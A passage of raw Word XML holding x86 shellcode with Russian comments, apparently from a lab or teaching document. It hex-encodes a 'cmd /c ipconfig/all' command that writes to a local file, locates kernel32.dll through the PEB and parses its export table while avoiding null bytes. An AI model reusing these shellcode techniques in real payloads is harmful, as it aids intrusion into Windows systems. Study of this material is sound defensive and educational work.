    <w:p w14:paraId="0AF8C956" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:t>ebp</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">-8], </w:t>
      </w:r>
      <w:r>
        <w:t>esp</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    ; Загружаем строку </w:t>
      </w:r>
      <w:r>
        <w:t>ExitProcess</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> и сохраняем ее</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05509B46" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0061744C" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35B72D00" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>xor esi, esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4624FA" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51057A17" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push word 7373h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A299414" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push 65726464h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0822A74C" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push 41636F72h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3478D4E5" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push 50746547h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8C1735" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>mov [ebp-0Ch], esp ; GetProcAddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6300B5" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="701ED8EC" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A74C646" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>xor esi, esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE7650A" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741C02E7" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push 7478742Eh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A842B0" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push 74656E5Ch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1353FE" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push 706F746Bh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038A336F" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push 7365445Ch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E3DBF9" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push 68746165h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7AD792" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push 685C7372h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ACB609" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push 6573555Ch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D0415F" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push 3A63203Eh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E68CC01" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push 206C6C61h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65670AD1" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push 2F676966h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D16E691" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push 6E6F6370h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32981F12" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push 6920632Fh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ECB994" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push 20646D63h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6498138B" w14:textId="583A3802" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>mov [ebp-34h], esp ; cmd</w:t>
      </w:r>
      <w:r w:rsidR="00B91728" w:rsidRPr="00B91728">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:r w:rsidR="00B91728">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ipconfig/all&gt; c:\Users\heath\Desktop\net.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39329EDA" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6604E57D" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">; Поиск адреса </w:t>
      </w:r>
      <w:r>
        <w:t>kernel</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>32.</w:t>
      </w:r>
      <w:r>
        <w:t>dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E4D382" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>xor</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>esi</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>esi</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> ; Избегаем нулевых байт в шеллкоде</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39932008" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ebx</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, [</w:t>
      </w:r>
      <w:r>
        <w:t>fs</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>:30</w:t>
      </w:r>
      <w:r>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:t>esi</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">] ; </w:t>
      </w:r>
      <w:r>
        <w:t>FS</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> содержит </w:t>
      </w:r>
      <w:r>
        <w:t>TEB</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, достаем адрес </w:t>
      </w:r>
      <w:r>
        <w:t>PEB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C40ABC5" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ebx</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, [</w:t>
      </w:r>
      <w:r>
        <w:t>ebx</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> + 0</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">]   ; Достаем </w:t>
      </w:r>
      <w:r>
        <w:t>PEB</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>LDR</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>DATA</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, содержащую информацию о загруженных длл</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380A8EBE" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ebx</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, [</w:t>
      </w:r>
      <w:r>
        <w:t>ebx</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> + 0</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">14]   ; Достаем список загруженных </w:t>
      </w:r>
      <w:r>
        <w:t>DLL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0812D144" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>mov ebx, [ebx]          ; ntdll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F2C0B2" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>mov ebx, [ebx]          ; kernelbase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD73FD5" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ebx</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, [</w:t>
      </w:r>
      <w:r>
        <w:t>ebx</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> + 0</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">10]   ; Получение базового адреса </w:t>
      </w:r>
      <w:r>
        <w:t>kernel</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>32.</w:t>
      </w:r>
      <w:r>
        <w:t>dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB8C00B" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:t>ebp</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-14</w:t>
      </w:r>
      <w:r>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">], </w:t>
      </w:r>
      <w:r>
        <w:t>ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAC54F6" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07446206" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, [</w:t>
      </w:r>
      <w:r>
        <w:t>ebx</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> + 3</w:t>
      </w:r>
      <w:r>
        <w:t>Ch</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">]    ; </w:t>
      </w:r>
      <w:r>
        <w:t>PE</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> сигнатура</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65712F02" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>add</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42254DB9" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, [</w:t>
      </w:r>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> + 78</w:t>
      </w:r>
      <w:r>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>]    ; Таблица экспорта</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C237E8F" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>add eax, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BB114F" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B93E9F9" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>mov ecx, [eax + 24h]    ; Ordinals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2483F357" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>add ecx, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751B0A13" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>mov [ebp-18h], ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295E60F5" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24BA59C4" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>edi</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, [</w:t>
      </w:r>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> + 20</w:t>
      </w:r>
      <w:r>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>]    ; Таблица имен</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1287FA" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>add edi, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF73826" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>mov [ebp-1Ch], edi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6031B15D" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D6E3963" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>edx</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, [</w:t>
      </w:r>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> + 1</w:t>
      </w:r>
      <w:r>
        <w:t>Ch</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>]    ; Таблица адресов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389C8DCA" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>add edx, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F85DEA" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
